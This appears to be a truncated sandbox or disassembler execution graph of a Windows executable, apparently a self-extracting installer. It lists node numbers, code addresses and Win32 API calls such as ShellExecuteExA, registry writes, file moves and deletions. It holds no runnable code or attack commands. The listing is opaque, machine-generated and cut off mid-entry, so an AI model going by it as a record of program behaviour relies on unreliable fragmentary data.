                                                                                                                                                  execution_graph 12164 40c78e 12165 40c798 12164->12165 12189 40bfe1 12164->12189 12213 40a250 OemToCharBuffA CharUpperA CharToOemBuffA 12165->12213 12167 40b613 ExpandEnvironmentStringsA 12167->12189 12168 40ca58 12169 40c7a5 12170 40c7fe 12169->12170 12172 405767 3 API calls 12169->12172 12173 40c8dc 12170->12173 12174 405822 GetFullPathNameA 12170->12174 12171 40c021 lstrcmpiA 12171->12189 12182 40c84b 12172->12182 12177 405822 GetFullPathNameA 12173->12177 12174->12173 12175 40c068 GetCurrentDirectoryA 12175->12189 12176 40c2fe SetWindowTextA 12176->12189 12179 40c8ef 12177->12179 12178 405767 3 API calls 12178->12182 12214 40aac2 SHGetMalloc SHGetSpecialFolderLocation SHGetPathFromIDListA 12179->12214 12181 40b7ba 3 API calls 12181->12189 12182->12170 12182->12178 12183 40a224 4 API calls 12183->12189 12184 40c41e RegOpenKeyExA 12186 40c43a RegQueryValueExA RegCloseKey 12184->12186 12184->12189 12185 405bdd MultiByteToWideChar 12185->12189 12186->12189 12187 405fad 10 API calls 12187->12189 12188 40a205 ctype 2 API calls 12188->12189 12189->12167 12189->12168 12189->12171 12189->12175 12189->12176 12189->12181 12189->12183 12189->12184 12189->12185 12189->12187 12189->12188 12190 40b9b0 3 API calls 12189->12190 12195 405bca FindClose 12189->12195 12200 40c3ee SendMessageA 12189->12200 12209 40c0f0 ctype 12189->12209 12191 40c3af GetDlgItem SetWindowTextA SendMessageA 12190->12191 12191->12189 12192 40c988 12201 4058ff 6 API calls 12192->12201 12193 40c8fe 12193->12192 12221 40a59a CompareStringA 12193->12221 12194 40c0f5 SetFileAttributesA 12197 40c1bb GetFileAttributesA 12194->12197 12194->12209 12195->12189 12198 40c1c9 DeleteFileA 12197->12198 12197->12209 12198->12209 12199 406ea5 GetVersionExA 12199->12209 12200->12189 12204 40c9ad 12201->12204 12202 405fad 10 API calls 12202->12209 12203 40c1e6 wsprintfA GetFileAttributesA 12205 40c208 MoveFileA 12203->12205 12203->12209 12216 40a9bd OleInitialize CoCreateInstance 12204->12216 12205->12209 12207 407300 4 API calls 12207->12209 12208 40c9fc 12208->12189 12210 40ca05 SHChangeNotify 12208->12210 12209->12189 12209->12194 12209->12197 12209->12199 12209->12202 12209->12203 12209->12207 12211 40c229 MoveFileExA 12209->12211 12212 40c19a SHFileOperationA 12209->12212 12210->12189 12211->12209 12212->12197 12213->12169 12215 40aaf8 12214->12215 12215->12193 12217 40aab5 OleUninitialize 12216->12217 12218 40a9ef 12216->12218 12217->12208 12219 40aa72 MultiByteToWideChar 12218->12219 12220 40aa9d 12218->12220 12219->12220 12220->12217 12221->12192 11911 40a7d8 11916 40a6c0 11911->11916 11915 40a7e8 11917 40a6d5 11916->11917 11919 40a6e8 11917->11919 11956 40e4da 11917->11956 11920 40a763 11919->11920 11959 402c62 11919->11959 11922 40d33c OleInitialize 11920->11922 11923 40e428 2 API calls 11922->11923 11924 40d358 GetCommandLineA 11923->11924 11925 40d378 GetModuleFileNameA SetEnvironmentVariableA 11924->11925 11926 40d36a 11924->11926 11928 406ea5 GetVersionExA 11925->11928 12028 40b485 11926->12028 11930 40d397 11928->11930 11931 40d39b GetModuleFileNameW 11930->11931 11932 40d3ae 11930->11932 11933 40d3b6 GetModuleHandleA LoadIconA LoadBitmapA 11931->11933 11932->11933 12032 411585 LoadLibraryA LoadLibraryA #17 LoadLibraryA 11933->12032 11935 40d3ee 12037 4098e0 11935->12037 11937 40d3f9 11938 40aca1 3 API calls 11937->11938 11939 40d410 11938->11939 11940 40aca1 3 API calls 11939->11940 11941 40d41a DialogBoxParamA 11940->11941 12042 40648f 11941->12042 11944 40648f OleUninitialize 11945 40d462 11944->11945 12045 4115fd 11945->12045 11949 40d49a DeleteObject 11952 40d4b1 DeleteObject 11949->11952 11953 40d4b4 11949->11953 11950 40d477 ctype 11950->11949 11951 40a205 ctype 2 API calls 11950->11951 11951->11949 11952->11953 11954 40d4ec OleUninitialize ExitProcess 11953->11954 12050 40b6ea WaitForSingleObject 11953->12050 11963 40e428 GetCPInfo 11956->11963 11960 402c6a 11959->11960 11966 402ba2 11960->11966 11964 40e44c IsDBCSLeadByte 11963->11964 11964->11964 11965 40e464 11964->11965 11965->11919 11989 4029f3 11966->11989 11969 40a668 2 API calls 11970 402bd9 11969->11970 11971 402be5 11970->11971 12013 40dd32 11970->12013 11973 40a668 2 API calls 11971->11973 11974 402bf5 11973->11974 11975 402c01 11974->11975 11976 40dd32 2 API calls 11974->11976 11977 40a668 2 API calls 11975->11977 11976->11975 11978 402c11 11977->11978 11979 402c1d 11978->11979 11980 40dd32 2 API calls 11978->11980 11981 40a668 2 API calls 11979->11981 11980->11979 11982 402c2d 11981->11982 11983 402c39 11982->11983 11984 40dd32 2 API calls 11982->11984 11985 40a668 2 API calls 11983->11985 11984->11983 11986 402c49 11985->11986 11987 402c55 11986->11987 11988 40dd32 2 API calls 11986->11988 11987->11920 11988->11987 11990 402a05 11989->11990 12003 402a12 11989->12003 12016 40dbe7 11990->12016 11992 40dbe7 2 API calls 11994 402a24 11992->11994 12000 40a65b ctype 2 API calls 11994->12000 11995 40dbe7 2 API calls 12001 402a3c 11995->12001 11996 402a5a 11999 402a74 11996->11999 12004 40dbe7 2 API calls 11996->12004 11997 402a42 11997->11996 12002 40dbe7 2 API calls 11997->12002 12009 402bab 11999->12009 12012 40a205 ctype 2 API calls 11999->12012 12005 402a2a 12000->12005 12006 40a65b ctype 2 API calls 12001->12006 12007 402a54 12002->12007 12003->11992 12003->12005 12008 402a6e 12004->12008 12005->11995 12005->11997 12006->11997 12010 40a65b ctype 2 API calls 12007->12010 12011 40a65b ctype 2 API calls 12008->12011 12009->11969 12010->11996 12011->11999 12012->12009 12021 40dc02 12013->12021 12017 4012aa ctype 2 API calls 12016->12017 12018 40dbf2 12017->12018 12019 4012aa ctype 2 API calls 12018->12019 12020 40dbfa 12019->12020 12022 40dbcb 2 API calls 12021->12022 12023 40dc16 12022->12023 12024 40dbcb 2 API calls 12023->12024 12025 40dc1e 12024->12025 12026 40dbcb 2 API calls 12025->12026 12027 40dc26 12026->12027 12027->11971 12030 40b49a 12028->12030 12029 40b60c SetEnvironmentVariableA 12029->11925 12030->12029 12031 40a250 OemToCharBuffA CharUpperA CharToOemBuffA 12030->12031 12031->12030 12033 4115ec SHGetMalloc 12032->12033 12034 4115cf GetProcAddress 12032->12034 12033->11935 12035 4115e5 FreeLibrary 12034->12035 12036 4115df 12034->12036 12035->12033 12036->12035 12062 409293 12037->12062 12039 4098ec 12079 4096af GetModuleHandleA FindResourceA 12039->12079 12041 4098f3 12041->11937 12043 406495 OleUninitialize 12042->12043 12044 40649b 12042->12044 12043->12044 12044->11944 12046 411610 12045->12046 12047 41160d FreeLibrary 12045->12047 12048 411617 FreeLibrary 12046->12048 12049 40d46a 12046->12049 12047->12046 12048->12049 12049->11950 12054 40b729 GetCurrentDirectoryA 12049->12054 12051 40b71f 12050->12051 12052 40b723 12051->12052 12053 40b706 PeekMessageA WaitForSingleObject 12051->12053 12052->11954 12053->12051 12055 40b7b8 12054->12055 12056 40b74d 12054->12056 12055->11950 12084 40a5bd CompareStringA 12056->12084 12058 40b767 12058->12055 12059 40b76b SetCurrentDirectoryA 12058->12059 12060 40b782 ctype 12059->12060 12061 40b797 SHFileOperationA 12060->12061 12061->12055 12063 4092a0 12062->12063 12064 4092b7 GetModuleFileNameA 12063->12064 12066 4092dc 12063->12066 12065 4092d3 12064->12065 12065->12066 12077 40930d ctype 12065->12077 12067 405097 4 API calls 12066->12067 12068 409309 12067->12068 12070 404fdc 31 API calls 12068->12070 12073 40568a 35 API calls 12068->12073 12076 4054ed 32 API calls 12068->12076 12068->12077 12078 4093f7 12068->12078 12069 4054ed 32 API calls 12071 40941c 12069->12071 12070->12068 12083 40a1ec GetProcessHeap RtlAllocateHeap 12071->12083 12073->12068 12074 40942a 12075 40568a 35 API calls 12074->12075 12074->12077 12075->12077 12076->12068 12077->12039 12078->12069 12078->12077 12080 4096dd 12079->12080 12082 4096d7 12079->12082 12081 409553 wvsprintfA 12080->12081 12081->12082 12082->12041 12083->12074 12084->12058 12104 40c59d 12105 40c5a7 12104->12105 12119 40bfe1 12104->12119 12135 40bd80 12105->12135 12107 40b613 ExpandEnvironmentStringsA 12107->12119 12108 40ca58 12109 40c021 lstrcmpiA 12109->12119 12110 40c068 GetCurrentDirectoryA 12110->12119 12111 40c2fe SetWindowTextA 12111->12119 12112 40b7ba 3 API calls 12112->12119 12113 40a224 4 API calls 12113->12119 12114 40c41e RegOpenKeyExA 12116 40c43a RegQueryValueExA RegCloseKey 12114->12116 12114->12119 12115 405bdd MultiByteToWideChar 12115->12119 12116->12119 12117 405fad 10 API calls 12117->12119 12118 40a205 ctype 2 API calls 12118->12119 12119->12107 12119->12108 12119->12109 12119->12110 12119->12111 12119->12112 12119->12113 12119->12114 12119->12115 12119->12117 12119->12118 12120 40b9b0 3 API calls 12119->12120 12123 405bca FindClose 12119->12123 12126 40c3ee SendMessageA 12119->12126 12133 40c0f0 ctype 12119->12133 12121 40c3af GetDlgItem SetWindowTextA SendMessageA 12120->12121 12121->12119 12122 40c0f5 SetFileAttributesA 12124 40c1bb GetFileAttributesA 12122->12124 12122->12133 12123->12119 12125 40c1c9 DeleteFileA 12124->12125 12124->12133 12125->12133 12126->12119 12127 405fad 10 API calls 12127->12133 12128 40c1e6 wsprintfA GetFileAttributesA 12129 40c208 MoveFileA 12128->12129 12128->12133 12129->12133 12130 407300 4 API calls 12130->12133 12131 406ea5 GetVersionExA 12131->12133 12132 40c229 MoveFileExA 12132->12133 12133->12119 12133->12122 12133->12124 12133->12127 12133->12128 12133->12130 12133->12131 12133->12132 12134 40c19a SHFileOperationA 12133->12134 12134->12124 12136 40bd92 ctype 12135->12136 12137 40be45 12136->12137 12145 40bf92 12136->12145 12160 40a59a CompareStringA 12136->12160 12139 405767 3 API calls 12137->12139 12140 40be59 12139->12140 12154 40be6f 12140->12154 12161 405822 GetFullPathNameA 12140->12161 12142 40beb7 ShellExecuteExA 12143 40bee9 12142->12143 12144 40becc ShellExecuteExA 12142->12144 12146 40bf36 CloseHandle 12143->12146 12147 40bf20 WaitForInputIdle 12143->12147 12148 40bf08 IsWindowVisible 12143->12148 12144->12143 12144->12145 12145->12119 12151 40bf44 12146->12151 12152 40bf51 12146->12152 12150 40b6ea 3 API calls 12147->12150 12148->12147 12149 40bf13 ShowWindow 12148->12149 12149->12147 12150->12146 12163 40a59a CompareStringA 12151->12163 12156 40bf7d Sleep 12152->12156 12157 40bf83 12152->12157 12154->12142 12155 405767 3 API calls 12154->12155 12158 40beaf 12155->12158 12156->12157 12157->12145 12159 40bf88 ShowWindow 12157->12159 12158->12142 12158->12145 12159->12145 12160->12137 12162 40584a 12161->12162 12162->12154 12163->12152 10084 40cc24 10085 40cc31 10084->10085 10203 40309d 10085->10203 10088 40cc5d 10090 40cc6f 10088->10090 10093 40cc67 10088->10093 10094 40ccce GetDlgItemTextA 10088->10094 10089 40d04f 10091 40d073 10089->10091 10092 40d064 SendMessageA 10089->10092 10095 40d08c 10091->10095 10096 40d07c SendDlgItemMessageA 10091->10096 10092->10091 10098 40cca7 10093->10098 10099 40cc6a 10093->10099 10097 40cd08 10094->10097 10094->10098 10278 40ba36 10095->10278 10096->10095 10102 40cd10 10097->10102 10103 40cd22 GetDlgItem 10097->10103 10098->10090 10106 40ccff EndDialog 10098->10106 10099->10090 10320 4098f7 10099->10320 10115 40d2a5 10102->10115 10116 40cffe 10102->10116 10108 40cd36 SendMessageA SendMessageA 10103->10108 10109 40cd57 SetFocus 10103->10109 10104 40d102 SetMenu 10110 40d159 GetCurrentDirectoryA GetDlgItem 10104->10110 10105 40d10b SetWindowPos DestroyWindow SendMessageA 10111 40d147 SendMessageA 10105->10111 10112 40d13c SendMessageA 10105->10112 10106->10090 10108->10109 10209 4058ff 10109->10209 10117 40d184 10110->10117 10118 40d18a SetWindowTextA 10110->10118 10111->10110 10112->10111 10131 40bf99 43 API calls 10115->10131 10121 4098f7 3 API calls 10116->10121 10117->10118 10296 40aafc 10118->10296 10127 40d00b SetDlgItemTextA 10121->10127 10124 40cd8b SetCurrentDirectoryA 10128 40cda3 GetLastError 10124->10128 10129 40cdaa 10124->10129 10125 40cd7b GetLastError 10126 40cd82 10125->10126 10126->10124 10133 40d01e 10127->10133 10128->10129 10216 406ea5 10129->10216 10136 40d2be 10131->10136 10132 40cc8f SetDlgItemTextA 10132->10090 10139 4098f7 3 API calls 10133->10139 10140 40d2d6 10136->10140 10141 40d2cc KiUserCallbackDispatcher 10136->10141 10142 40d03b 10139->10142 10145 40d2f0 10140->10145 10361 40307f GetDlgItem KiUserCallbackDispatcher 10140->10361 10141->10140 10148 4098f7 3 API calls 10142->10148 10143 40bf99 43 API calls 10173 40d1d1 10143->10173 10144 40d234 10144->10136 10156 40bf99 43 API calls 10144->10156 10147 40d31b 10145->10147 10158 40d315 PostMessageA 10145->10158 10159 40d30d SendMessageA 10145->10159 10147->10090 10161 4098f7 3 API calls 10147->10161 10154 40d042 MessageBoxA 10148->10154 10149 40ce31 10162 40cef0 10149->10162 10163 40ce4f GetModuleFileNameA wsprintfA ShellExecuteExA 10149->10163 10150 40cf4d 10228 40b92f 10150->10228 10151 40cdc4 GetTickCount wsprintfA 10155 40cdeb 10151->10155 10152 40d2e7 10362 40307f GetDlgItem KiUserCallbackDispatcher 10152->10362 10154->10090 10219 4051d8 10155->10219 10164 40d24d 10156->10164 10158->10147 10159->10147 10167 40d32a SetDlgItemTextA 10161->10167 10171 4098f7 3 API calls 10162->10171 10163->10162 10168 40cecd WaitForInputIdle Sleep 10163->10168 10170 40d27e 10164->10170 10178 40d25e 10164->10178 10165 4098f7 3 API calls 10165->10173 10167->10090 10176 40cf40 KiUserCallbackDispatcher 10168->10176 10170->10115 10174 40d289 DialogBoxParamA 10170->10174 10172 40cefa wsprintfA 10171->10172 10180 40cf22 10172->10180 10173->10144 10173->10165 10186 40d211 10173->10186 10174->10115 10175 40cf68 10235 40307f GetDlgItem KiUserCallbackDispatcher 10175->10235 10176->10090 10177 40ce02 ctype 10177->10149 10177->10150 10179 406d54 29 API calls 10178->10179 10182 40d273 10179->10182 10185 4098f7 3 API calls 10180->10185 10358 40a205 10182->10358 10183 40cf71 10236 40307f GetDlgItem KiUserCallbackDispatcher 10183->10236 10188 40cf2b MessageBoxA 10185->10188 10186->10144 10189 40d219 10186->10189 10188->10176 10332 406d54 10189->10332 10190 40cf79 10237 40bf99 10190->10237 10194 40bf99 43 API calls 10195 40cf95 10194->10195 10268 40b322 10195->10268 10198 40bf99 43 API calls 10201 40cfb2 10198->10201 10199 40cfd8 10331 40307f GetDlgItem KiUserCallbackDispatcher 10199->10331 10201->10199 10202 40bf99 43 API calls 10201->10202 10202->10199 10204 4030ca 10203->10204 10207 4030a6 10203->10207 10380 40952c 10204->10380 10206 4030c8 10206->10088 10206->10089 10207->10206 10363 40970e 10207->10363 10213 405910 10209->10213 10210 4059b4 10210->10124 10210->10125 10211 40598a 10211->10210 10392 405898 10211->10392 10213->10211 10215 405898 5 API calls 10213->10215 10400 40e115 WideCharToMultiByte 10213->10400 10215->10213 10217 406ee6 10216->10217 10218 406eb8 GetVersionExA 10216->10218 10217->10149 10217->10151 10217->10177 10218->10217 10220 4051e7 10219->10220 10221 406ea5 GetVersionExA 10220->10221 10222 4051fb 10221->10222 10223 405221 CreateFileA 10222->10223 10224 40520b CreateFileW 10222->10224 10225 405237 10223->10225 10224->10225 10226 40e115 WideCharToMultiByte 10225->10226 10227 405268 10225->10227 10226->10227 10227->10177 10229 40b943 10228->10229 10230 40b9ab 10228->10230 10229->10230 10231 40b95c RegCreateKeyExA 10229->10231 10234 40307f GetDlgItem KiUserCallbackDispatcher 10230->10234 10231->10230 10232 40b982 10231->10232 10233 40b98a RegSetValueExA RegCloseKey 10232->10233 10233->10230 10234->10175 10235->10183 10236->10190 10238 40bfa6 10237->10238 10239 40ca58 10238->10239 10408 40b613 10238->10408 10239->10194 10241 40c021 lstrcmpiA 10252 40bfd4 10241->10252 10242 40b613 ExpandEnvironmentStringsA 10242->10252 10243 40c068 GetCurrentDirectoryA 10243->10252 10244 40c2fe SetWindowTextA 10244->10252 10247 40c41e RegOpenKeyExA 10249 40c43a RegQueryValueExA RegCloseKey 10247->10249 10247->10252 10249->10252 10251 40a205 ctype 2 API calls 10251->10252 10252->10239 10252->10241 10252->10242 10252->10243 10252->10244 10252->10247 10252->10251 10259 40c3ee SendMessageA 10252->10259 10266 40c0f0 ctype 10252->10266 10412 40b9b0 10252->10412 10419 405bdd 10252->10419 10423 405fad 10252->10423 10432 405bca 10252->10432 10435 40b7ba 10252->10435 10441 40a224 10252->10441 10255 40c0f5 SetFileAttributesA 10257 40c1bb GetFileAttributesA 10255->10257 10255->10266 10258 40c1c9 DeleteFileA 10257->10258 10257->10266 10258->10266 10259->10252 10260 405fad 10 API calls 10260->10266 10261 40c1e6 wsprintfA GetFileAttributesA 10262 40c208 MoveFileA 10261->10262 10261->10266 10262->10266 10264 406ea5 GetVersionExA 10264->10266 10265 40c229 MoveFileExA 10265->10266 10266->10252 10266->10255 10266->10257 10266->10260 10266->10261 10266->10264 10266->10265 10267 40c19a SHFileOperationA 10266->10267 10427 407300 10266->10427 10267->10257 10269 40b32f 10268->10269 10458 40dd5a 10269->10458 10271 40b354 10461 403888 10271->10461 10275 40b3ca 10480 403981 10275->10480 10277 40b3d5 10277->10198 11778 40ad27 10278->11778 10281 40bb22 GetDlgItem GetWindowRect MapWindowPoints SetMenu CreateWindowExA 10281->10104 10281->10105 10282 40ba4c GetWindow 10282->10281 10285 40ba69 10282->10285 10283 40ba7e GetClassNameA 11783 40da54 CompareStringA 10283->11783 10285->10281 10285->10283 10286 40baa6 GetWindowLongA 10285->10286 10287 40bb07 GetWindow 10285->10287 10286->10287 10288 40bab6 SendMessageA 10286->10288 10287->10281 10287->10285 10288->10287 10289 40bac8 GetObjectA 10288->10289 11784 40ace4 10289->11784 10291 40badd 11788 40aca1 10291->11788 11792 40abdc GetDC CreateCompatibleDC CreateCompatibleDC GetObjectA 10291->11792 10294 40baed SendMessageA 10294->10287 10295 40bb00 DeleteObject 10294->10295 10295->10287 10297 406ea5 GetVersionExA 10296->10297 10298 40ab07 10297->10298 10299 40ab56 GetClassNameA 10298->10299 10300 40ab22 GetModuleHandleA 10298->10300 10307 40ab9c 10298->10307 10301 40ab6b lstrcmpiA 10299->10301 10302 40ab8e 10299->10302 10303 40ab31 GetProcAddress 10300->10303 10304 40ab42 10300->10304 10301->10302 10305 40ab80 FindWindowExA 10301->10305 10306 40ab93 SHAutoComplete 10302->10306 10302->10307 10303->10304 10304->10299 10304->10307 10305->10302 10306->10307 10308 40ca95 10307->10308 10309 40caa2 10308->10309 11795 401884 10309->11795 10314 40cb1c 10317 401b38 ctype 2 API calls 10314->10317 10315 40a668 2 API calls 10319 40caf6 10315->10319 10316 40a205 ctype 2 API calls 10316->10314 10318 40cb27 10317->10318 10318->10143 10318->10173 10319->10314 10319->10316 10321 409907 10320->10321 10322 40993a LoadStringA 10321->10322 10323 40994c LoadStringA 10321->10323 10322->10323 10324 40995a 10322->10324 10323->10324 10325 409553 wvsprintfA 10324->10325 10326 409967 10325->10326 10327 4027d8 SHGetMalloc 10326->10327 10328 4027f3 SHBrowseForFolderA 10327->10328 10330 4027ef 10327->10330 10329 402830 SHGetPathFromIDListA 10328->10329 10328->10330 10329->10330 10330->10090 10330->10132 10331->10102 10333 406d65 OleInitialize #17 10332->10333 10334 406d77 ShowWindow 10332->10334 10333->10334 11888 406ced LoadCursorA RegisterClassExA 10334->11888 10336 406d92 GetWindowRect GetParent MapWindowPoints 10337 406dc6 DestroyWindow 10336->10337 10338 406dcd GetParent CreateWindowExA 10336->10338 10337->10338 10339 406e18 10338->10339 10340 406e0a ShowWindow UpdateWindow 10338->10340 10341 406e2d 10339->10341 10342 406e1e 10339->10342 10340->10339 10344 406e34 DestroyWindow 10341->10344 10345 406e3e ShowWindow 10341->10345 10343 406e2b 10342->10343 11889 4066b3 GetTickCount GetTickCount 10342->11889 10343->10144 10344->10345 10347 406e4d 10345->10347 11896 40a1ec GetProcessHeap RtlAllocateHeap 10347->11896 10349 406e5b 10350 406e7a 10349->10350 11897 4065e9 10349->11897 11903 406a19 10350->11903 10354 40a205 ctype 2 API calls 10355 406e8a 10354->10355 10355->10343 10356 406e8e SetWindowTextA 10355->10356 10357 40a205 ctype 2 API calls 10356->10357 10357->10343 10359 40a220 10358->10359 10360 40a20e GetProcessHeap RtlFreeHeap 10358->10360 10359->10170 10360->10359 10361->10152 10362->10145 10383 409637 10363->10383 10365 40972d GetWindowRect GetClientRect 10366 409768 10365->10366 10367 40979b 10365->10367 10368 4097db GetSystemMetrics GetWindow 10366->10368 10369 40976e SetWindowPos 10366->10369 10367->10368 10370 4097a1 GetWindowTextA 10367->10370 10379 4097ff 10368->10379 10369->10367 10386 409553 10370->10386 10372 4098d9 10372->10206 10373 4097cb SetWindowTextA 10373->10368 10374 40980c GetWindowTextA 10374->10379 10375 409553 wvsprintfA 10378 40983f SetWindowTextA 10375->10378 10376 409855 GetWindowRect SetWindowPos 10377 4098bb GetWindow 10376->10377 10377->10372 10377->10379 10378->10379 10379->10372 10379->10374 10379->10375 10379->10376 10379->10377 10381 409550 10380->10381 10382 409532 GetWindowLongA SetWindowLongA 10380->10382 10381->10206 10382->10381 10384 409553 wvsprintfA 10383->10384 10385 409659 10384->10385 10385->10365 10387 40956a 10386->10387 10389 4095d5 10386->10389 10390 40a610 wvsprintfA 10387->10390 10389->10373 10391 40a635 10390->10391 10391->10389 10393 406ea5 GetVersionExA 10392->10393 10394 4058a1 10393->10394 10395 4058bd CreateDirectoryA 10394->10395 10397 4058b2 CreateDirectoryW 10394->10397 10396 4058c8 10395->10396 10399 4058de 10396->10399 10402 4057e8 10396->10402 10397->10396 10399->10210 10401 40e139 10400->10401 10401->10213 10403 406ea5 GetVersionExA 10402->10403 10404 4057ed 10403->10404 10405 40580c SetFileAttributesA 10404->10405 10407 4057ff SetFileAttributesW 10404->10407 10406 40581a 10405->10406 10406->10399 10407->10406 10409 40b620 10408->10409 10410 40b6ae ExpandEnvironmentStringsA 10409->10410 10411 40b6d4 10409->10411 10410->10411 10411->10252 10413 40ba32 GetDlgItem SetWindowTextA SendMessageA 10412->10413 10414 40b9c2 10412->10414 10413->10252 10415 40b9d1 RegOpenKeyExA 10414->10415 10415->10413 10416 40b9ee RegQueryValueExA 10415->10416 10417 40ba29 RegCloseKey 10416->10417 10418 40ba1a 10416->10418 10417->10413 10418->10417 10420 405bea 10419->10420 10421 405c05 10420->10421 10446 40e144 MultiByteToWideChar 10420->10446 10421->10252 10424 405fbb 10423->10424 10425 405c10 10 API calls 10424->10425 10426 406038 10424->10426 10425->10424 10426->10252 10448 4072db 10427->10448 10430 40a610 wvsprintfA 10431 407326 10430->10431 10431->10266 10433 405bd5 FindClose 10432->10433 10434 405bdc 10432->10434 10433->10434 10434->10252 10436 40b7c7 10435->10436 10456 40a1ec GetProcessHeap RtlAllocateHeap 10436->10456 10438 40b613 ExpandEnvironmentStringsA 10440 40b7d3 10438->10440 10439 40b871 10439->10252 10440->10438 10440->10439 10442 40a237 GetProcessHeap HeapReAlloc 10441->10442 10443 40a22d 10441->10443 10445 40a235 10442->10445 10457 40a1ec GetProcessHeap RtlAllocateHeap 10443->10457 10445->10252 10447 40e163 10446->10447 10447->10421 10451 40da9a 10448->10451 10452 4072e9 10451->10452 10453 40daa5 10451->10453 10452->10430 10452->10431 10455 40a250 OemToCharBuffA CharUpperA CharToOemBuffA 10453->10455 10455->10452 10456->10440 10457->10445 10486 40dc32 10458->10486 10460 40dd65 10460->10271 10462 403891 10461->10462 10601 40a668 10462->10601 10466 4038c0 10604 410b78 10466->10604 10469 404950 10470 40495d 10469->10470 10475 4049e5 10470->10475 10655 406045 10470->10655 10472 404a72 10474 4098f7 3 API calls 10472->10474 10478 404a9f 10472->10478 10476 404a96 10474->10476 10475->10472 10479 406045 11 API calls 10475->10479 10661 4047ab 10475->10661 10477 40b2a9 15 API calls 10476->10477 10477->10478 10478->10275 10479->10475 10481 40398f 10480->10481 10483 40399c ctype 10480->10483 10482 41020a 2 API calls 10481->10482 10484 403996 10482->10484 10483->10277 10485 40a65b ctype 2 API calls 10484->10485 10485->10483 10487 40dc48 10486->10487 10494 401313 10487->10494 10489 40dc51 10493 40dc9a 10489->10493 10500 40eb33 10489->10500 10491 40dc7b 10506 4012b7 10491->10506 10493->10460 10495 40134f 10494->10495 10496 401327 10494->10496 10495->10489 10497 40a224 4 API calls 10496->10497 10498 40133f 10497->10498 10498->10495 10512 403443 10498->10512 10501 40eb47 10500->10501 10502 40eb74 10500->10502 10503 40a224 4 API calls 10501->10503 10502->10491 10504 40eb64 10503->10504 10504->10502 10505 403443 30 API calls 10504->10505 10505->10502 10507 4012f6 10506->10507 10508 4012cb 10506->10508 10507->10493 10509 40a224 4 API calls 10508->10509 10510 4012e6 10509->10510 10510->10507 10511 403443 30 API calls 10510->10511 10511->10507 10517 40339f 10512->10517 10518 4098f7 3 API calls 10517->10518 10519 4033a6 10518->10519 10530 40ae5a 10519->10530 10522 40328f 10523 40329c 10522->10523 10524 4032bd 10523->10524 10547 405472 10523->10547 10524->10495 10531 40ae6a 10530->10531 10532 4033ac 10530->10532 10531->10532 10533 40ae6f wvsprintfA 10531->10533 10532->10522 10535 40ad46 GetDlgItem 10533->10535 10536 40ad76 10535->10536 10537 40ada8 SendMessageA SendMessageA 10535->10537 10544 40649c 10536->10544 10539 40adf8 SendMessageA SendMessageA SendMessageA 10537->10539 10540 40addc 10537->10540 10542 40ae42 SendMessageA 10539->10542 10543 40ae24 SendMessageA 10539->10543 10540->10539 10542->10532 10543->10542 10545 4064b1 ShowWindow SendMessageA SendMessageA 10544->10545 10546 4064a6 DestroyWindow 10544->10546 10545->10537 10546->10545 10548 405483 10547->10548 10549 4032b2 10548->10549 10564 404fac 10548->10564 10571 404f2e 10548->10571 10552 40b877 10549->10552 10553 40b8a1 10552->10553 10554 40b88c 10552->10554 10556 4032b7 10553->10556 10557 40b8b6 ShowWindow 10553->10557 10555 4098f7 3 API calls 10554->10555 10558 40b893 SetDlgItemTextA 10555->10558 10563 40a600 ExitProcess 10556->10563 10559 40b8c6 10557->10559 10560 40b8e3 10557->10560 10558->10553 10559->10560 10561 40b8ce SendMessageA 10559->10561 10560->10556 10598 40a82d PeekMessageA 10560->10598 10561->10560 10565 404fb5 10564->10565 10566 404fb9 10564->10566 10565->10548 10567 404fc4 10566->10567 10568 404f2e 30 API calls 10566->10568 10567->10565 10577 405866 10567->10577 10568->10567 10572 404f40 10571->10572 10573 404f3a 10571->10573 10572->10573 10574 404f60 10572->10574 10575 404f4e FindCloseChangeNotification 10572->10575 10573->10548 10574->10573 10583 4032d5 10574->10583 10575->10574 10578 406ea5 GetVersionExA 10577->10578 10579 40586b 10578->10579 10580 405886 DeleteFileA 10579->10580 10582 40587d DeleteFileW 10579->10582 10581 404fda 10580->10581 10581->10548 10582->10581 10584 4032e1 10583->10584 10590 4032f4 10583->10590 10585 4098f7 3 API calls 10584->10585 10587 4032ec 10585->10587 10586 40328f 30 API calls 10588 403300 10586->10588 10591 40b2a9 10587->10591 10588->10573 10590->10586 10593 40b2b6 10591->10593 10592 40b302 10592->10590 10593->10592 10594 40b2ce wvsprintfA 10593->10594 10595 40ae5a 13 API calls 10594->10595 10596 40b2f5 10595->10596 10596->10592 10597 40b2fb SetLastError 10596->10597 10597->10592 10599 40a848 GetMessageA TranslateMessage DispatchMessageA 10598->10599 10600 40a869 10598->10600 10599->10600 10600->10560 10617 40a1ec GetProcessHeap RtlAllocateHeap 10601->10617 10603 4038b3 10603->10466 10612 40fe4c 10603->10612 10605 410b83 10604->10605 10611 410ba2 10604->10611 10606 40a668 2 API calls 10605->10606 10607 410b8d 10606->10607 10610 403443 30 API calls 10607->10610 10607->10611 10610->10611 10618 410a90 10611->10618 10649 40609f 10612->10649 10614 40fe54 10652 407ad8 10614->10652 10617->10603 10619 4038d3 10618->10619 10620 410aa0 ctype 10618->10620 10619->10469 10622 41018e 10620->10622 10631 40dbcb 10622->10631 10625 4101cb 10626 40dbcb 2 API calls 10625->10626 10628 4101d6 10626->10628 10629 4101fd 10628->10629 10630 40fee6 2 API calls 10628->10630 10630->10628 10632 40dbd4 10631->10632 10633 40dbda 10631->10633 10634 40a205 ctype 2 API calls 10632->10634 10633->10625 10635 40fee6 10633->10635 10634->10633 10640 40fad6 10635->10640 10645 4012aa 10640->10645 10643 4012aa ctype 2 API calls 10644 40fae9 10643->10644 10646 4012b0 10645->10646 10647 4012b6 10645->10647 10648 40a205 ctype 2 API calls 10646->10648 10647->10643 10648->10647 10650 40a668 2 API calls 10649->10650 10651 4060ac 10650->10651 10651->10614 10653 40609f 2 API calls 10652->10653 10654 407ae0 10653->10654 10654->10466 10656 40605e 10655->10656 10658 406062 10656->10658 10680 405c10 10656->10680 10658->10470 10659 406074 10659->10658 10660 406079 FindClose 10659->10660 10660->10658 10662 4047b8 10661->10662 10719 4051ac 10662->10719 10666 404805 10668 404809 10666->10668 10672 404820 10666->10672 10667 4047e7 10960 401b38 10667->10960 10948 4076a4 10668->10948 10672->10667 10678 406045 11 API calls 10672->10678 10679 4048d3 10672->10679 10952 4077c1 10672->10952 10676 4048f0 10676->10667 10765 401ce5 10676->10765 10827 403a34 10676->10827 10678->10672 10760 4038d8 10679->10760 10681 406ea5 GetVersionExA 10680->10681 10682 405c23 10681->10682 10683 405c30 10682->10683 10684 405dec 10682->10684 10687 